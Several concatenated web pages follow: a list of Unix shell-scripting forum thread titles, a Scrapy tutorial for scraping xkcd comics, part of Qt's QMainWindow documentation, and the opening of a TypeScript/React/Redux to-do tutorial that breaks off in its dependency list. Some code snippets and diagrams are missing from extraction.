- disk usage - Write in file from awk - split monthly logfiles into daily logfiles - .mailrc question - blind search pattern with AWK - I am stuck in my script - Help with this code - New to scripts - Grep related thing - Grep All lines between 2 different patterns - Append line that does not contain pipe to it previous line - AWK\SED advice - Issue in mail sending process - Sed to grep only numbers in string - Changing directories using variables. - Sed Problem - Modulus operator - \r characters in the file - decimal calculation - URGENT grep question - Cutting columns starting at the end of each line... - Re-arrangement of data - How to remove a file with a particular pattern - Capturing the output from an exec command - Long running shell scripts shuts donw the machine! - Need help in creating 10,000 files in unix - using list only file - awk calculation problem - assigning a variable - passing multiple files as parameters - problem in reading a file - Re-formatting of data display - data break split - problem in if condition - Use sed or gsub command - View the Server Total Ram in GB - Check Word if exist on file or not - What am I doing wrong? - Problem with awk and if statement - Need Help with Sort Command - Check for a pattern - If File has been updated, do something?? - find 4 chars on 2nd line, 44 chars over - Row to column converter using Awk or grep? - Prefix a string to the contents of a file - Locate file and path - Kron Shell: deleting all but most recent log files - whois scripting - differences in calling another script inside script - SFTP / UNZIP script issues - Sed command to find, manipulate and replace a number - Tricky array substitution in functions - Removing spaces from data - What does kill $! do? 
- crontab test argument expected - SFTP failure from unix to windows server - compare/match arrays - awk/sed Command : Parse parameter file / send the lines to the ksh export command - issue in calculation - Parse variable into a command - SED command for read and write to different files - Grep part of the line - Automate shell script - ksh: How to store each output line into a different variable? - script optimization - help need in filtering data - Clear Terminal After Exit - Replacing a pattern in a line - For loop variable to take value linewise, not word-wise - cronjob: Partial script error - help needed in grep and copy - second line of the file - How to Sort files on date field - for i in `cat myname.txt` && for y in `cat yourname.txt` - if [ -f "$variable" ]; then issues, help! - need help with sed command - Question using signals in my own shell.. - if $varib contains non-numeric charctr then... - Capture Schell script error - [Help]RegEx, Putty, Copy Files Insensitive Matching, SSH - Insert Title To Each Lines - foreign characters - Arrays - Can one do a tr within an awk - Gen. Question - Script calls multiple programs - Return Code Handling? - please suggest me a site - help with Korn script - Parsing question. - Getting rid of "Warning: no access to tty.... - How should I add a timeout to my scripts? - Need Help - awk/sed script to read values from parameter files - Append lines with SED - shell translator - awk multidimensional values - Replace characters then read the file without changing it - regarding IFS= - parsing and calculating difference. - Problem with Mailx command to send mail with attachment - Read the directory path - How to extract 3rd line 4th column of a file - KSH Script to Get the <TAG Values> from an XML file - not able to process files - Please let me know - read records from a file - About export - Get coprocess output into var - row count of 60 files in one file - important. select 10 files each time. 
- filter input & outputs to another file - shopt -s nullglob - How to build a command in a script - Grep MS Word document - Problem with shell script - 1 script or multiple scripts?? - check files, run jobs - Homemade echo command - Folder Lock in Unix - how to cut off last column from the output - Editing a ksh script > Please assist! - Newbie problem with simple script to create a directory - Calculate the time difference between a local file and a remote file. - unix shell script which inserts some records into a file located in remote servers... - Cutting segment of a string - Problem with SCP parellel processing - Script to raise the alarm in the log File - Can we timeout cd command - plz understand my query... - Problem with sed string substitution - Grep yesterday logs from weblogic logs - Print Only second Duplicate entry in the file - Interesting TCL behavior: 007 == 7 is true; 008==8 is false. - Removal of Duplicate Entries from the file - how to convert columns to rows - bash - add backslash in front of variables w/ spaces - Passing a regexp to grep via a shell script - if txtfile has any letters, echo something! - Can you explain me a tclsh file? - need help with script - selective printing of lines - Help with awk printout - how to grep only IP address of e1000g0 using ifconfig -a - removing items from a file with batch - Start a new process when memory/cpu utilisation falls - awk returning "[: ==: unary operator expected" - AWK help for traces in NS2 - Sed question - replace a string with another - Kill a process from a grep - Storing string with space (urgent) - Unix commands in one line - 'df -k .' on remote server - cronjobs stopped working - DISPLAY Script - Editing MSWORD Doc - Multiple instances of the job in shell script. 
- Repeating groups problem - Shell Script to extract Soft - root password in SH scripts - need help in ftp - Regarding Random Number Genration - check for a file on a remote machine - append string with spaces to a line - file checking - check line by line in a file - count up file - Perl script to invoke Cold Backups - Append value in a file - Create a cronjob - How to validate a column? - find + - assign shell var output of cmd "wc" - Loop - Dynamic calculation - change first word in the every new line - [AWK] read lines with \x00 symbol - help with chmod (files only) - using todays date to create a report using grep - Simple script uploading *.dem files to an ftp - How to Delete string without opening a file - delete strings till specific string - list comparison - How to append copyright to all files? - Need an AWK script to calculate the percentage - Standard output redirection from a variable - for loop - Awk Script for generating a report - Scripts and basics - Find recently updated files in home directory - want to grep only strings in a file? - is is possible remove junk chars from the strings? - how to append the pattern at the end of the line - copy file from script file to remote computer - calculating endless columns - Script for FTP (transfer only new files) - Script to calculate user's last login to check if > 90 days - Get the total of a field in all the lines of a group - Simplfy - Perl Script Issue - Please Help * Thanks!!! - Find files ONLY in current directory - Filtering line out of file - Number of *.txt files which have over n lines? - moving multiple folders/files in subversion using bash script - delete a single space in a line - Filtering symbols from contents - How can i calculate percentage ?? - how to check DB connection in unix shell script - How to parse slash / in sed command.. 
- AWK - averaging $3 by info in $1 - Running "df -k" on all UNIX platforms - form a line with strings - Finding duplicate lines and deleting folders based on them - can u please confirme the correct - To substitute a string in a line to another string - shell script to read data from text file and to load it into a table in TOAD - take last column includning spaces also - If conditional - Menu Script - comparing files content - Need a script - Is there any better way for sorting in bash/awk - ksh scripting: Extract 1 most recent record for unique key - exit script if user input not four characters - Sorting Windows Directories using Korn script. - Need Help with this Script - shell script in C++ - end of line issue - common UNIX script which is to work in HP and SUN environment - how to do something if grep string is there - problems with a script that outputs data to a file - append a line - Using Sed to read one line only - using variables with sed - egrep parameters - need help in decimel calculation - merging fields from 2 different files. - Deleting files using find command - How to print lines till till a pattern is matched in loop - need loop clarification for the below code - How to remove a cron job interactively? - Scp between two servers - how to insert data into database by reading it from a text file?? - How to display an error msg? - Need help with shell script - use full book for unix - How to insert some constant text at beginig of each line within a text file. - AWK command - Accessing array elements - awk - Split a binary file into 2 basing on 2 delemiter string - Perl Script Syntax error in version 4 - Problem with awk - sed to remove last 2 characters of txt file - Problem with Substring - Check if script run by a user directly or via other scripts - sed to remove 1st two characters every line of text file - how to generate var len strings of a given char - Script to Compare a large number of files. 
- Need help in awk - calling a function in Shell script troubleshooting - awk -v -- Why doesn't my example work? - How to sca a sequential file and fetch some substring data from it - shell script for primary and standby DB archive log check - Converting a text file to HTML - replaying a record count with another record count - Delete files if they exist - How to awk/sed/grep lines which contains a pattern at a given position - Please correct the code - taking a part from file name - Passing parameter from one file to shell script - VI editor,column postion - AWK to skip comments in XML file - cut problem - Perl Question - getting the line number - difficult nawk to understand - Manipulating a variable across multiple shell scripts - Sed filtering issue - Find a path of a specific file - >> append formatting - Lines with strange characters and sed... - new joine need help - shell script preserving last 2 versions of files - how to scan a sequential file to fetch some of the records? - Test condition - executing shell scripts in a browser - read line in a for loop - add a hyphen every 2 characters of every line - How to scan data directly from Table using a script - sed problem - last line of file deleted - i need books (programming shell) - Remove parenthesis character (Perl) - Error in cron job; - not waiting - Shell commands - diplay user process in separate lines - [ORACLE] CREATE TABLE in bash - Delete a line - substitute commas with pipe - Multiple SQLPLUS background processes not working properly - Separating values from a file and putting to a variable - How to do the date operation ??? - How to get the time cost of functions? - How to delimit a flat file with records with SED - fail a unix script - Help with awk - Split and print - Advanced Search & Delete Text File - How to use SSH to connect to Primary DB and send alert mail - manage function's output - Calculate date by week - Awk help - smart script? 
- remove directory x seconds after script completes - New to Shell scripting: Can you check it? - Bash script help - removing items with repeated first 3 character - usage of echo with standard input - perl+CGI+mysql !!!!!!! - Find - Awk Multiline Record Combine? - Is it possible with sed or awk? - sorting prob - Increment value (starttime) - I want records in file2 those are not exist in file1 - summarising totals in awk - need help with script - output to file, but complicated - awk help required to group output and print a part of group line and original line - Awk Compare File1 File2 on f2 - simplfy - Regular expressions - Perl - sending an attachment - simple question - extracting domain names out of a text file - awk or perl - awk syntax doubt - trailing 1 value - Insert IP address into MySQL int field - help me with write script shell to do grid-proxy-init - How to remove xml namespace from xml file using shell script? - variable help - time diff help - Break line after last "/" if length > X characters - Send-file /var/log/message - Help me... - awk array - Perl REGEX - Help deleting lines with SED. - Extract Part of a "Word", using AWK or SED???? - ls -l all files created between two times - who - uniq output - Awk Help Needed * Please Help - Redirect grep output to dynamique fileName and subdirectory - need help with creating dynamic tcl displays - query about Attachement in mail - egrep problem - ksh to bash mode - How to check if two variable are empty strings at once? (bash) - Hiding password for FTP in a script - Join command - How can I match lines with just one occurance of a string in awk? 
- how to compare string & integer in unix - Variable issues - How to search a directory in unix - modifying date (-10 hours) in the content of a file - How to avoid a temp file - find command: various date ranges - Capture all the contents between two attributes - Performance Tuning - CSV Table Filtered/transposed/matched using CSH - File reading problem via shell script - How to print string on screen according the fixed length? - How to concatenate a string and a variable - TO Extract Last 10 Characters from a line - adding the data at a specified location in a file.... - grep problem - Extract XML Element Values - how to get SQLcode - Ping text file of ip addressese and output to text file - How to compare contents of two CSV rows - Use loop in sed or awk? - find command and wrapping in the script - searching for info in paragraph - Get zip path from unzip -l - Can awk do lookups to other files and process results - getopts with repeat of same option - Get the latest added part of a text file? - quick question - To print a specific line in Shell or awk. - GREP with contain output - Read Ms-excel file in unix - Unix File Validation! Help - Renaming multiple files - how to find watermark in a pdf - Exporting CLASSPATH in manifest service file - Please Help required. - Problem in awk - need some clarification on for loop in shel script - Shell Script to replace tokens in multiple files - Loop problem - Shell script using ssh remains connected at primary site - crucial storage issue with ebcdic to ascii converter - Running Sql scripts accross db2 - How to Open Shell Script from X-Manager Console - shell script not connecting to primary from standby site - finding line number if the line contains - Need help with a script - foor loop is not working while assigning to variable - Replace Characters for bunch of Files. 
- replacing a character with another - Perl + object-oriented programming help - How to remove new line char from a string - script to take row count - Loop through directories for a file - delete record - grep, remove and conconate -- xml files - Need to know if theres "and if" like command - Outputting data from multiple lines - need to insert two columns (or two feilds) at the begining of the table - Need help with a manual task - Using unset to delete array elements - Show if I have new mail in .profile ? - compare data line by line from a file - replacing blank lines - Need help with IF and Grep - help again - search backwards relative to a string - vi question - Compare two files UNMATCH in solaris - Bourne shell script with embedded Sybase SQL - shell script not getting current error messages with time from alert.log - How to split a text after fix character count - How to compare the dates.. - Script Needed Urgent!!!!!!!!! - sed-question delete everthing after a couple of numbers - Extracting regular expression - Deleting a file from REMOTE Unix Server - matrix indexes - moving file to directory in script - Timestamp issue - Running a script for every ftp session - finding in files - algorithm for comparing files - Counting string of a variable - script to compare first column of two files and find difference - HASH(0x775090)= from env - loop and check - To force a script to wait for another. - replace characters in a file - FileWatcher Script - control click variables - textbox and user interaction - To get value from oracle & assign it in UNIX variable - Processes create/join - Convert from CSV to space padded columns (.ksh) - \n not working properly - Need to print only selected char in a string..? - Grab a number at end of filepath - Reading a Parameter File - check processes on remote system? 
- Running a script in INFINITE LOOP - compare two files for matching in solaris - Another sed question - Shell script process remains after "exit 1" - Extracting specific text from a file - Regular expression with sed - usage of telnet in shell script - How to grep substring from a line ? - Need to convert ksh script to Perl - Pick up the return code for every iteration and display the result only once in loop. - Sum values & compare with footer - create a new file - parse long input parameters - Perl - To print past 5 mins timestamp - report negative value from file - Help Me Please - Help Me Please - How to Rename/Convert Files in Shell Scripting? - FTP Problem - file reading through shell script - Limits of FOR loop to go to end of File - Append Spaces At end of each line Leaving Header and Footer - progress bar - Help Please - how to create auto-answer file - need some help getting started on this script - Can I create a file from the command line - Puzzling Problem: Going back to the previous directory - mailx/mail subject variable with spaces (bash) - Find all files with group read OR group write OR user write permission - Pause for response from the log file - Copying files to the mount point. - Help with scripting APT / dpkg in Debian 4 - Copy files listed in a text file - whitespace problem. - Pass array variabel to awk from shell - Shell/perl script to connect to different servers in single login in teradata - New to forums and had a quick one. - Script to move files based on Pattern don't work - KSH list as function parameter - SFTP through KSH - Inserting lines in between the contents of file. - TCL logging - Inserting a file into another file above a specified location - help with this code - search fields within a file - Delimiter count in a string. 
- writing into one line - pattern extract - Reading data from a file through shell script - Shell script dynamically case in VAR - double-quote inside double-quote - FTP automation script - How to compare result lpstat with hostsfile - Get string from file after nth symbol - calling a ksh script present in different unix box - How to add text in a file - Read variables contain spaces from text file - hw to insert array values sequentially in a file - Config File with ksh - SCP Exit Codes - get the line number - How to read from a file in unix - finding lines only between a certain string - Find and display largest file on system - error in in running script - syntax error: unexpected end of file - How to Compare two files depend on line length Chars - How to insert and delete any line after desire line - What is wrong with the rsh? - expr error in ksh - File downloading - Help on email data file as excel from unix!! - Shell-script to HP-UX - XML root element - how to run a script when pen drive is inserted - switch user inside a script - comparing sentences - How to make sure a file is uploaded in its entirety - Counting the number of pipes in line - Reading large file, awk and cut - inserting a line after a perticular line - Scripting to convert underscores to spaces - removing the "\" and "\n" character using sed or tr - print disk space warning of 70% - XML Awk : Urgent - copying files from one server to another server - Inserting file into another file at a specified line number - How to pass parameters to an awk file? 
- how to flip values of two columns and add an extra column - need help in line number of a file - create file in script - How To Neglect Delimiter - shell script to search a string and delete the content - Generate report in HTML file from Oracle DB - How to track exit status of ftp automation - awk to find a formated o/p - delete a string from line - sed command - How to find Duplicate Records in a text file - read files from directory - How to findDuplicate Records in a text file - using sed to get IP-address - Parsing X char from right to left - StdOut to file --> Append Mode - How to grep more than 2 fields? - initialize file to zero - How to find this pattern in a file - capturing the most recent pid from csh - line contains a string write to new file otherwise append - Application for the script - sorting names after doing a find - Ftp scripting question - On how to select the right tool for a given task - Find percent between sum of 2 columns awk help - How to extract text from string using regular expressions - Extracting email address using basename - Need a regex - Using Expect results in a Shell script - problem running shell script (for oracle export) in crontab - perl redirect output to file ..not working - Want to search value and two previous value - using substring in shell script - converting the data type in unix shell script - Print previous, current and next line using sed - How to decrease the font size in Mailx - SSHing from a shell script - delete entry from /etc/hosts file ? - Using awk to read a field - infinite loop to check process is running - intent: df -kh | filter based on capacity (used space) column where % > 85 - Dynamic Log Deletion/Rotatoin Script - How can I add a header to a csv file - SFTP through shellscripts - Redirect within ksh - find command - checking the return code - Set a variable that changes every time? 
- Shell append or insert - extract lines based on few conditions - joining 2 lines into single one - Help with NAWK regular expressions - while replacing the pattern last line is last - problem in while loop in a script - shell script - line contains a string - having problem with for loop - merge rows based on a common column - Multiple instances of a job. - what are the use of these command - links to all networking commands in linux - kill 0 - shell script which will delete every thing under a directory except a single sub dire - how to use ssh-keygen to login to a UNIX box - formatting lines in a particular fashion - need help in awk - du command error in ksh - last run time of any script - cut columns in everyline - trimm up the decimal places in output - Help assembling script - echo 2 txt files to screen no carraige return - script to archive and purge - Remove matching lines with list of strings - Split line before the pattern - Converting Huge Archive into smaller ones - Redirecting part of output to stdout - Shell script makefile - awk and execute - Counting names - perl arrays - How to delete ctrl key values in a given string? - Edit this rsync for me plz !! - Extract pattern from text line - Patern Match Question on file names - How can I make running gawk scripts more user-friendly in a Windows environment? - How to avoid duplication within 2 files? - fourth field is number in a line - moving a file having blanks in its name - Make script delete certain files - DB2 -txvf explanation.. - Detailed disk usage versus age summary - Please help to debug a small shell script (maybe AWK problem)? - format the extracted data - Bash 'shopt' doubt - How to write a If loop.. - grep problem in perl - parsing aline - error in ksh script - How to compare 2 files. - print certain pattern from 2 lines - How to get the process id - Print the line within the search pattern - need help in grep - How to replace a line in a file with another line from another file!! 
- Conditional concat lines awk - How to calculate the time difference. - shell script for moving all the file from the same folder - integer expression expected error - FTP files to target Mainframe system - how to grep for a word in a log file.. - shell problem - comparing two strings - php ebooks - Find and replace in a gz file - Unexpected sed result. - script to compare two files of mac address - Accessing php script from shell script - Incorrect output using find command - Weird Interpretation by Awk - parsing a file by line - How to convert the data into excel sheet and send mail using 'mailx' command - copy directory structure to a system on the network - Swapping or switching 2 lines using sed - run awk on one file for each line in a second file - convert unix date to readable format - Unique values from a Terabyte File - Getting Unique values in a file - extract/select pattern from input - How can i copy user permissions(privileges) to a group - Last Command not giving year - ModInverse in perl - cut command - Insert two strings at the beginning and at the end of each line of a file - Help need for automation of su command - Removing end of line to merge multiple lines - Pattern matching problem in PERL script - Using shell to get the last character in a line - Truncating FILE data BASED ON A PATTERN - Database access - copying a file from one dir to another dir - Perl script error - Extract pattern from text line - reading files from diractory one by one - ascii sorting in unix - change line found by pattern using sed - Background-Process with #>/dev/null - Get data from 3 differrnt oracle DB & then compare data - delete a line that does not match the pattern - How to merge multiline into line begining with specific word - How check for a new file on a ftp-server - Differece in '-s' and '-e' - binary to ascii - file editing - select a line that contains the strings - kill a process initiated by crontab - Not access variable outside loop when a reading a 
file
http://www.unix.com/unix/linux/f-30-p-7.html
This tutorial is intended to show how to use the Scrapy framework to quickly write web scrapers. As an example, I will implement a simple scraper to extract comic links and associated alt text and transcripts from xkcd.com. This tutorial assumes that you are comfortable with Python. It also assumes a basic understanding of HTTP and some familiarity with XPath notation.

Installation

Scrapy works with Python 2.6 or 2.7. If you're on Windows, you will also have to install OpenSSL. Once you have the prerequisites, the easiest way to install Scrapy is with pip:

    pip install scrapy

If this does not work for you, please refer to the installation guide in the Scrapy documentation.

Concepts

Scrapy is a framework, which means that it implements a lot of the "boilerplate" functionality for you, and all you need to do is implement the bits specific to your application. Scrapy breaks these bits down into several categories. For this tutorial, we'll only focus on the following:

- Items: these define the data that you want to extract. If you are familiar with ORMs such as the Django ORM or SQLAlchemy, then Items are equivalent to Models. If you're not familiar with ORMs, you can think of Items as classes that define what comprises a single "data record" that you want to extract.
- Spiders: these do the actual crawling and scraping of web pages. They contain the "business logic" for your crawler. Scrapy comes with a couple of base implementations that you can subclass.
- Link Extractors: these are used to extract links that a spider would use to crawl web sites. Scrapy comes with a couple of built-in extractors that should suffice for the majority of use cases.
- Selectors: these are used to extract data from web pages. They parse the contents of the HTTP response into an easily query-able format. If you weren't using Scrapy, you would typically do this with lxml or BeautifulSoup (and in fact, you could just use one of these instead of a selector, if you wanted).
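To make the selector idea concrete, here is a rough standard-library-only sketch of the kind of extraction a selector performs — pulling the src and alt attributes of an image out of a page. This uses html.parser rather than Scrapy's selector, and the sample markup is my own illustration, not taken from xkcd:

```python
from html.parser import HTMLParser

class ComicImageExtractor(HTMLParser):
    """Collect the attributes of every <img> tag encountered while parsing."""
    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            # attrs is a list of (name, value) pairs
            self.images.append(dict(attrs))

# Hypothetical sample HTML standing in for an HTTP response body.
page = '<div id="comic"><img src="/comics/duty_calls.png" alt="Duty Calls"/></div>'
parser = ComicImageExtractor()
parser.feed(page)
print(parser.images[0]["alt"])  # -> Duty Calls
```

A real selector adds a query language (XPath) on top of this, so you describe *what* you want rather than writing parsing callbacks by hand.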
Scrapy comes with an excellent XPath-based selector by default, so we'll stick with that for the tutorial.

Project Structure

The bits you implement need to be located somewhere Scrapy can find them, so your project must follow the structure that Scrapy expects. Luckily, Scrapy can generate the project directory for you. So let's start by creating a project:

    ~/projects$ scrapy startproject xkcd_scraper
    ~/projects$ tree xkcd_scraper/
    xkcd_scraper/
    |-- scrapy.cfg
    |-- xkcd_scraper
        |-- __init__.py
        |-- items.py
        |-- pipelines.py
        |-- settings.py
        |-- spiders
            |-- __init__.py

    2 directories, 6 files

The top-level project directory contains the Scrapy configuration file scrapy.cfg (which we will not need to worry about in this tutorial) and the Python package with the code for the project (with the same name as the project). Within the package, there are files for defining the various parts of the scraper. In this tutorial, we're only concerned with items and spiders.

Writing the Scraper

Item

First, we need to define what it is that we want to scrape from a web site. We do this by implementing an Item to describe the data inside of xkcd_scraper/xkcd_scraper/items.py. This is as easy as subclassing Item and creating a Field for each individual bit of data we want to scrape:

    from scrapy.item import Item, Field

    class XkcdComicItem(Item):
        image_url = Field()
        alt_text = Field()
        transcript = Field()

Here, we're saying that we want to extract the image URL, alt text, and transcript for each xkcd comic.
Spider

Now let's define how we are going to extract the data by creating a spider inside xkcd_scraper/xkcd_scraper/spiders/__init__.py:

    from scrapy.contrib.spiders import CrawlSpider, Rule
    from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
    from scrapy.selector import HtmlXPathSelector
    from xkcd_scraper.items import XkcdComicItem

    class XkcdComicSpider(CrawlSpider):
        name = 'xkcd-comics'
        start_urls = ['']
        rules = (
            Rule(SgmlLinkExtractor(restrict_xpaths='//a[@rel="next"]'),
                 follow=True, callback='parse_comic'),
        )

OK, this is a bit more complicated, so let's break it down.

    class XkcdComicSpider(CrawlSpider):

We're subclassing the CrawlSpider class. A CrawlSpider will start with the initial set of URLs and will crawl from there according to a set of rules.

    name = 'xkcd-comics'
    start_urls = ['']
    rules = (
        Rule(SgmlLinkExtractor(restrict_xpaths='//a[@rel="next"]'),
             follow=True, callback='parse_comic'),
    )

Here, we're defining the behaviour of the crawler.

- The name is used to uniquely identify the crawler, and we'll use it to invoke the crawler later.
- start_urls is the list of initial URLs that the spider will start crawling. For this, we're specifying the URL of the first xkcd comic we want to scrape (if we wanted to scrape all comics, we would start with '', but that would take a good while to run).
- rules specifies how the crawler will proceed from the initial URLs. Our spider has only one rule -- it will use the built-in link extractor to extract the link to the next comic (the cryptic XPath just means "find <a> HTML elements with the rel attribute set to "next" anywhere in the contents"); it will then invoke the specified callback to process the contents of that URL; finally, it will attempt to "follow" that URL, i.e. recursively apply the crawl rules to the contents of that URL.
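To see what that restrict_xpaths expression matches, here is a small standard-library illustration. xml.etree.ElementTree supports only a limited subset of XPath, and this toy navigation markup is my own sample, not real xkcd markup:

```python
import xml.etree.ElementTree as ET

# A toy fragment of "previous/next" navigation markup (hypothetical sample data).
page = """
<ul>
  <li><a rel="prev" href="/613/">Prev</a></li>
  <li><a rel="next" href="/615/">Next</a></li>
</ul>
"""

root = ET.fromstring(page)
# Equivalent in spirit to //a[@rel="next"]: find <a> elements whose rel is "next".
next_links = [a.get("href") for a in root.findall(".//a[@rel='next']")]
print(next_links)  # -> ['/615/']
```

The link extractor in the spider does essentially this on every crawled page, then feeds each matched link back into the crawl queue.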
This is the callback that will get invoked for each page the spider crawls, and this is where the actual scraping happens. All we're doing here is using a selector to find the relevant data in the HTML returned in the HTTP response and populating an instance of the Item we've created earlier with that data. We're using Scrapy's HtmlXPathSelector here, but you could use something like lxml if you are more comfortable with that.

OK, that's it. We're done. We now have a fully functioning web scraper. It's time to take it for a spin.

Running the Scraper

To run the scraper, navigate to the top-level project directory (the one with the scrapy.cfg file) in your favorite shell and run scrapy like so:

    ~/projects/xkcd_scraper$ scrapy crawl xkcd-comics -t json -o xkcd-comics.json

Here, we're telling scrapy that we want it to crawl using the xkcd-comics spider (the name we've given to our Spider earlier), and we want the output to be formatted as JSON and written to the xkcd-comics.json file in the current directory. Once you type that in and hit enter, you'll see a whole bunch of log output (by default, the verbosity level is set to DEBUG) telling you exactly what Scrapy is doing. When all available comics have been scraped, Scrapy will print out a summary and then exit, leaving the JSON file with the output. One of the cool things about Scrapy is that you can hit CTRL-C at any point to abort the crawling, and you'll always get a well-formatted JSON file with the data that has been scraped so far.

Batteries Included

This tutorial focused on how to write a web scraper with the minimum amount of fuss. As such, it barely scrapes the surface of the functionality available in Scrapy. If there is demand for it (and if I have the time/motivation), I might cover some of the more advanced features in a future tutorial. For now, here is a subset of the features that are available:

- You can use pipelines to process the items once they are extracted, e.g.
to clean the data or handle missing items.
- You can use signals to hook into any part of the scraping process.
- Scrapy provides an easy way of collecting stats about what has been scraped.
- Scrapy has a daemon and a web service for managing several scrapers using JSON RPC.
- Scrapy comes with a command line tool and an interactive shell.

Check out the docs for the full list of features and in-depth guides.
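Conceptually, the JSON feed export used above boils down to serializing each scraped item dict into one JSON document. This is a standard-library-only sketch with made-up item data, not Scrapy's actual exporter code:

```python
import io
import json

# Hypothetical scraped items, shaped like our XkcdComicItem fields.
items = [
    {"image_url": "/comics/duty_calls.png", "alt_text": "Duty Calls", "transcript": "..."},
    {"image_url": "/comics/python.png", "alt_text": "Python", "transcript": "..."},
]

buf = io.StringIO()          # stands in for the xkcd-comics.json file
json.dump(items, buf, indent=2)

# What's written is always a valid JSON list, so it round-trips cleanly.
reloaded = json.loads(buf.getvalue())
print(len(reloaded))  # -> 2
```

The benefit of having the framework own this step is exactly the CTRL-C behaviour described above: the exporter is responsible for leaving the output well-formed no matter when the crawl stops.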
http://python-forum.org/viewtopic.php?f=25&t=1626
The QMainWindow class provides a main application window. More... #include <QMainWindow> Inherits QWidget. The QMainWindow class provides a main application window. QMainWindow provides a main application window, with a menu bar, tool bars, dock widgets and a status bar around a large central widget, such as a text edit, drawing canvas or QWorkspace (for MDI applications). The saveState() and restoreState() functions provide a means to save and restore the layout of the QToolBars and QDockWidgets in the QMainWindow. These functions work by storing the objectName of each QToolBar and QDockWidget together with information about placement, size, etc. QMainWindow uses separators to separate QDockWidgets from each other and the central widget. These separators let the user control the size of QDockWidgets by dragging the boundary between them. A QDockWidget can be as large or as small as the user wishes, between the minimumSizeHint() (or minimumSize()) and maximumSize() of the QDockWidget. When a QDockWidget reaches its minimum size, space will be taken from other QDockWidgets in the direction of the user's drag, if possible. Once all QDockWidgets have reached their minimum sizes, further dragging does nothing. When a QDockWidget reaches its maximum size, space will be given to other QDockWidgets in the opposite direction of the user's drag, if possible. Once all QDockWidgets have reached their maximum sizes, further dragging does nothing. QDockWidget displays a title bar to let the user drag the dock widget to a new location. A QDockWidget can be moved to any location provided enough space is available. (QMainWindow won't resize itself to a larger size in an attempt to provide more space.) A QRubberBand is shown while dragging the QDockWidget. This QRubberBand provides an indication to the user about where the QDockWidget will be placed when the mouse button is released. All un-nested QDockWidgets in the same dock area are considered neighbors.
When dragging a QDockWidget over its neighbor: The following diagram depicts this behavior: When dragging nested QDockWidgets, or when dragging to a different dock area, QMainWindow will split the QDockWidget under the mouse. Be aware that the QDockWidget under the mouse will only be split by the QDockWidget being dragged if both can fit in the space currently occupied by the QDockWidget under the mouse. A QDockWidget can be split horizontally or vertically, with the QDockWidget being dragged being placed in one of four possible locations, as shown in the diagram below: The QDockWidget::floatable property influences feedback when the user drags a QDockWidget over the central widget: In either case, dragging the mouse over another QDockWidget causes QMainWindow to choose the other QDockWidget's dock area. When dragging outside the QMainWindow, the QDockWidget::floatable property again controls feedback during dragging. When the property is false, dragging outside of the QMainWindow will show the rubber band over the QDockWidget's current location. This indicates that the QDockWidget cannot be moved outside of the QMainWindow. When the QDockWidget::floatable property is true, dragging outside of the QMainWindow will show the QRubberBand under the mouse pointer. This indicates that the QDockWidget will be floating when the mouse button is released. See also QMenuBar, QToolBar, QStatusBar, and QDockWidget. addToolBar() is an overloaded member function, provided for convenience; each overload behaves essentially like the others, and the single-argument form is equivalent to calling addToolBar(Qt::TopToolBarArea, toolbar). createPopupMenu() is called to create a popup menu when the user right-clicks on the menu bar, a toolbar or a dock widget. If you want to create a custom popup menu, reimplement this function and return the created popup menu. Ownership of the popup menu is transferred to the caller.
dockWidgetArea() returns the Qt::DockWidgetArea for dockwidget. removeDockWidget() removes the dockwidget from the main window; removeToolBar() removes the toolbar from the main window. setStatusBar() sets the status bar for the main window to statusbar. Warning: this function should be called at most once for each main window instance. Note: The Qt::LayoutDirection influences the order of the dock widgets in the two parts of the divided area. When right-to-left layout direction is enabled, the placing of the dock widgets will be reversed. statusBar() returns the status bar for the main window. This function creates and returns an empty status bar if the status bar does not exist. See also setStatusBar(). toolBarArea() returns the tool bar area for toolbar. See also addToolBar(), addToolBarBreak(), and Qt::ToolBarArea. The toolButtonStyleChanged() signal is emitted when the style used for tool buttons in the window is changed. The new style is passed in toolButtonStyle. You can connect this signal to other components to help maintain a consistent appearance for your application. See also setToolButtonStyle().
http://doc.trolltech.com/4.0/qmainwindow.html
TypeScript is a typed superset of JavaScript. It has become popular recently in applications due to the benefits it can bring. If you are new to TypeScript, it is highly recommended to become familiar with it first before proceeding. TypeScript is a great language to choose if you are a JavaScript developer and interested in moving towards a statically typed language. Using TypeScript is such a logical move for developers that are comfortable with JavaScript but haven't written in languages that are statically typed (like C, JVM languages, Go, etc). As I began my journey to TypeScript (I'm most comfortable with JS, but have written a little bit in Go and C), I found it to be pretty easy to pick up. My initial thought was: "It really isn't that bad typing all the arguments in my functions and typing the return value; what's the fuss all about?" It was nice and simple until we had a project where we needed to create a React/Redux app in TypeScript. It's super easy to find material for React + JS, but as you begin to search for React + TS and especially React + Redux + TS, the amount of online tutorials (including YouTube videos) begins to dwindle significantly. I found myself scouring Medium, Stack Overflow, etc. for anything I could find to help explain how to set up the project, how types flow between files (especially once Redux is involved), and how to build with Webpack. This article is a way for me to solidify my knowledge of React + Redux + TS, and to hopefully provide some guidance for anyone else who is interested in using this tech stack for the front end. TypeScript is becoming more popular, so I hope this is useful to others in the community.
Prerequisites: I assume you're aware of how React, Redux, and Webpack work, and also most concepts in TypeScript (at least interfaces and generics).

What are we gonna build? Just to keep it simple, we'll build the infamous to-do list application. Remember that the purpose is to understand how to set up the project and know how TypeScript integrates with React and Redux. The features that this application will support are: The code for the project can be found here:.

For my project, I didn't use create-react-app --typescript to get the project started. I found that it was a valuable learning experience to get it started from scratch. I'll go step by step through the important files and folders needed to get this project up and running. Before we start, let me show you what the final structure looks like.

TS-Redux-React-Boilerplate
├── build
├── node_modules
├── public
│   ├── bundle.js
│   └── index.html
├── src
│   ├── App.tsx
│   ├── index.tsx
│   ├── actions
│   │   ├── actions.ts
│   │   └── index.ts
│   ├── components
│   │   ├── index.ts
│   │   └── TodoItem.tsx
│   ├── containers
│   │   └── TodoContainer.tsx
│   ├── reducers
│   │   ├── index.ts
│   │   └── todoReducers.ts
│   ├── store
│   │   └── store.ts
│   └── types
│       └── types.d.ts
├── .gitignore
├── package-lock.json
├── package.json
├── tslint.json
├── tsconfig.json
├── webpack.config.js
└── README.md

First, let's look at the package.json file and install these dependencies using npm i.

"dependencies": {
  "@types/node": "^12.0.0",
  "@types/react": "^16.8.15",
  "@types/react-dom": "^16.8.4",
  "@types/react-redux": "^7.0.8",
  "react": "^16.8.6",
  "react-dom": "^16.8.6",
  "react-redux": "^7.0.3",
  "redux": "^4.0.1",
  "ts-loader": "^5.4.5",
  "typesafe-actions": "^4.2.0",
